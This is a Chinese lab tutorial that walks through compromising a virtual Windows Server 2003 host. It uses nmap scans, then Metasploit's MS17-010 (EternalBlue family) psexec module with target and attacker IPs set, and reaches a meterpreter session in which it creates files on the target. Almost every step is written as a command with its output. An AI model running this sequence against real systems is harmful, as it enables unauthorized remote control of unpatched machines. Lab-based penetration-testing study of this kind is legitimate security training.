NMAP MSF實現對目標系統滲透(Windows server 2003控制)
- Metasploit是一個免費的、可下載的框架,通過它可以很容易地獲取、開發並對計算機軟件漏洞實施攻擊。
- 此次採用kali Linux系統集成的metasploit進行測試驗證MS17-010(永恆之藍,著名比特幣勒索漏洞)。實驗環境均採用虛擬機。
前提準備:
Kali linux: 192.168.1.113
Windows server2003:192.168.1.102
1,方式一先使用nmap探測網絡中存活主機(設備)
方式二
root@wangzhike:~# netdiscover -i eth0 -r 192.168.1.0/24
目標系統:192.168.1.102 windows server 2003
2,探測網絡中的系統類型(nmap)
root@wangzhike:~# nmap -O 192.168.1.0/24
3.端口掃描
root@wangzhike:~# nmap -p 1-1000 192.168.1.102
root@wangzhike:~# nmap -p 1-1000 192.168.1.102
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-16 12:46 CST
Nmap scan report for 192.168.1.102
Host is up (0.000071s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: 00:0C:29:82:C6:C2 (VMware)
端口介紹:
135端口:服務dcom、rpc的端口----客戶機連入系統服務
139端口:netbios文件打印共享服務—共享磁盤
445端口:文件夾共享、打印共享服務
4,利用server 2003自身漏洞(ms17-010)
前提:Windows server 2003 需要關閉防火牆。
入侵前必須初始、啓動數據庫。
root@wangzhike:~# msfdb init //初始化數據庫
root@wangzhike:~# msfdb start //啓動數據庫
root@wangzhike:~# netstat -ntlup | grep post //查看端口
root@wangzhike:~# msfdb status //查看數據庫狀態
root@wangzhike:~# nmap --script=smb-vuln*.nse 192.168.1.102
我們·可以看到Windows server 2003存在ms17-010漏洞
root@wangzhike:~# msfconsole
#####進入後不一定是這種樣式#####
msf > search ms17_010 //搜索查看漏洞
[!] Module database cache not built yet, using slow search
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/admin/smb/ms17_010_command 2017-03-14 normal MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
auxiliary/scanner/smb/smb_ms17_010 normal MS17-010 SMB RCE Detection
exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
exploit/windows/smb/ms17_010_psexec 2017-03-14 normal MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
msf >
我們利用這個模塊:exploit/windows/smb/ms17_010_psexec
msf > use windows/smb/ms17_010_psexec //利用模塊
set rhosts 192.168.1.102 //設置攻擊目標的IP地址
set lhost 192.168.1.113 //攻擊機ip地址
進行攻擊run侵入:
侵入後可看到meterpreter>
我們就可以使用ifconfig命令
####地址爲192.168.1.102####
查看當前目錄pwd
在C:\WINDOWS目錄中創建wang.txt和hello.txt文件
在Windows server 2003中查看創建的兩個目錄
當然我們也可以進行其他控制!!!
至此,我們就可以使用kali linux 控制Windows server 2003啦!!!